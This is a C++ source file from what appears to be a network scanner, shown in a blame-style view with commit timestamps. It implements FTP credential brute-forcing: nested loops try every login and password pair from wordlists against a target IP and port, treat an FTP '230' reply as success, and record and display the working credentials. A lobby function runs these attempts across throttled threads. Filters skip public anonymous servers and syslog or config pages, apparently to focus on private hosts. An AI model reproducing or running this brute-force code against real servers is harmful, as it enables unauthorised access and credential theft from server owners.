2015-03-16 14:29:34 +00:00
|
|
|
#include "FTPAuth.h"
|
2015-03-27 10:38:38 +00:00
|
|
|
#include "FileUpdater.h"
|
2015-03-16 14:29:34 +00:00
|
|
|
|
|
|
|
bool FTPA::checkOutput(const string *buffer) {
|
2015-04-16 11:51:51 +00:00
|
|
|
if(Utils::ustrstr(*buffer, "230") != -1) {
|
2015-03-16 14:29:34 +00:00
|
|
|
|
|
|
|
return true;
|
|
|
|
}
|
|
|
|
|
|
|
|
return false;
|
|
|
|
}
|
|
|
|
|
2015-03-23 13:54:40 +00:00
|
|
|
lopaStr FTPA::FTPBrute(const char *ip, const int port, PathStr *ps) {
|
2015-03-16 14:29:34 +00:00
|
|
|
string buffer;
|
|
|
|
string lpString;
|
2015-04-04 12:43:22 +00:00
|
|
|
lopaStr lps = {"UNKNOWN", "", ""};
|
2015-03-16 14:29:34 +00:00
|
|
|
|
2015-03-22 00:43:15 +00:00
|
|
|
int res = 0;
|
2015-03-22 10:13:17 +00:00
|
|
|
int passCounter = 0;
|
2015-08-07 22:37:28 +00:00
|
|
|
int rowIndex = -1;
|
2015-03-16 14:29:34 +00:00
|
|
|
|
2016-02-28 16:07:10 +00:00
|
|
|
char login[32] = {0};
|
2015-03-24 14:29:27 +00:00
|
|
|
char pass[32] = {0};
|
|
|
|
|
2015-08-07 22:37:28 +00:00
|
|
|
for (int i = 0; i < MaxFTPLogin; ++i)
|
2015-03-16 14:29:34 +00:00
|
|
|
{
|
|
|
|
if(!globalScanFlag) return lps;
|
2015-08-07 22:37:28 +00:00
|
|
|
FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready; });
|
|
|
|
strcpy(login, ftpLoginLst[i]);
|
|
|
|
if (strlen(login) <= 1) continue;
|
2015-03-16 14:29:34 +00:00
|
|
|
|
2015-08-07 22:37:28 +00:00
|
|
|
for (int j = 0; j < MaxFTPPass; ++j)
|
2015-03-16 14:29:34 +00:00
|
|
|
{
|
|
|
|
if(!globalScanFlag) return lps;
|
2015-08-07 22:37:28 +00:00
|
|
|
FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready; });
|
|
|
|
strcpy(pass, ftpPassLst[j]);
|
|
|
|
if (strlen(pass) <= 1) continue;
|
2015-03-24 14:29:27 +00:00
|
|
|
|
2016-04-09 21:16:03 +00:00
|
|
|
lpString = string(login) + ":" + string(pass);
|
2015-03-22 00:43:15 +00:00
|
|
|
|
2015-04-28 23:27:54 +00:00
|
|
|
Connector con;
|
2016-01-20 17:53:41 +00:00
|
|
|
res = con.nConnect(ip, port, &buffer, NULL, NULL, &lpString);
|
2015-08-07 22:37:28 +00:00
|
|
|
if (res == -2) {
|
2016-02-28 16:07:10 +00:00
|
|
|
rowIndex = Utils::addBARow(QString(ip), "--", "FAIL", rowIndex);
|
2015-08-07 22:37:28 +00:00
|
|
|
return lps;
|
|
|
|
}
|
2015-03-22 00:43:15 +00:00
|
|
|
else if (res != -1) {
|
2016-04-16 17:47:33 +00:00
|
|
|
if (buffer.find("syslog") != -1 || buffer.find("CFG-PAGE") != -1) {
|
|
|
|
if (gNegDebugMode) {
|
|
|
|
stt->doEmitionDebugFoundData("Ignoring " + QString(ip) + " (syslog or CFG-PAGE)");
|
|
|
|
}
|
|
|
|
return lps;
|
|
|
|
}
|
2015-03-22 00:43:15 +00:00
|
|
|
ps->directoryCount = std::count(buffer.begin(), buffer.end(), '\n');
|
2015-08-07 22:37:28 +00:00
|
|
|
|
2016-04-16 17:47:33 +00:00
|
|
|
if (3 == ps->directoryCount) {
|
|
|
|
if (-1 != buffer.find("pub") || -1 != buffer.find("incoming")) {
|
|
|
|
if (gNegDebugMode) {
|
|
|
|
stt->doEmitionDebugFoundData("Ignoring " + QString(ip) + " (pub or incoming)");
|
|
|
|
}
|
|
|
|
return lps;
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
|
|
|
if (!globalScanFlag) return lps;
|
|
|
|
strcpy(lps.login, login);
|
|
|
|
strcpy(lps.pass, pass);
|
|
|
|
|
2016-02-28 16:07:10 +00:00
|
|
|
rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), "OK", rowIndex);
|
2015-08-07 22:37:28 +00:00
|
|
|
|
2015-03-22 00:43:15 +00:00
|
|
|
return lps;
|
|
|
|
};
|
2015-03-22 10:13:17 +00:00
|
|
|
|
2016-02-28 16:07:10 +00:00
|
|
|
rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), QString::number((passCounter / (double)(MaxFTPPass*MaxFTPLogin)) * 100).mid(0, 4) + "%", rowIndex);
|
2015-08-07 22:37:28 +00:00
|
|
|
++passCounter;
|
|
|
|
Sleep(50);
|
2015-03-16 14:29:34 +00:00
|
|
|
}
|
|
|
|
}
|
|
|
|
|
2016-02-28 16:07:10 +00:00
|
|
|
rowIndex = Utils::addBARow(QString(ip), "--", "FAIL", rowIndex);
|
2015-03-16 14:29:34 +00:00
|
|
|
return lps;
|
|
|
|
}
|
|
|
|
|
2015-03-23 13:54:40 +00:00
|
|
|
lopaStr FTPA::FTPLobby(const char *ip, const int port, PathStr *ps) {
|
2015-04-02 12:33:49 +00:00
|
|
|
if(gMaxBrutingThreads > 0) {
|
|
|
|
while(BrutingThrds >= gMaxBrutingThreads) Sleep(1000);
|
2015-03-16 14:29:34 +00:00
|
|
|
|
2015-04-04 12:43:22 +00:00
|
|
|
++baCount;
|
|
|
|
++BrutingThrds;
|
2016-01-24 19:03:28 +00:00
|
|
|
stt->doEmitionUpdateArc(gTargets);
|
2015-04-04 12:43:22 +00:00
|
|
|
const lopaStr &lps = FTPBrute(ip, port, ps);
|
|
|
|
--BrutingThrds;
|
2015-03-16 14:29:34 +00:00
|
|
|
|
2015-04-02 12:33:49 +00:00
|
|
|
return lps;
|
|
|
|
} else {
|
2015-08-07 22:37:28 +00:00
|
|
|
lopaStr lps = {"UNKNOWN", "", ""};
|
2015-04-02 12:33:49 +00:00
|
|
|
return lps;
|
|
|
|
}
|
2015-03-16 14:29:34 +00:00
|
|
|
}
|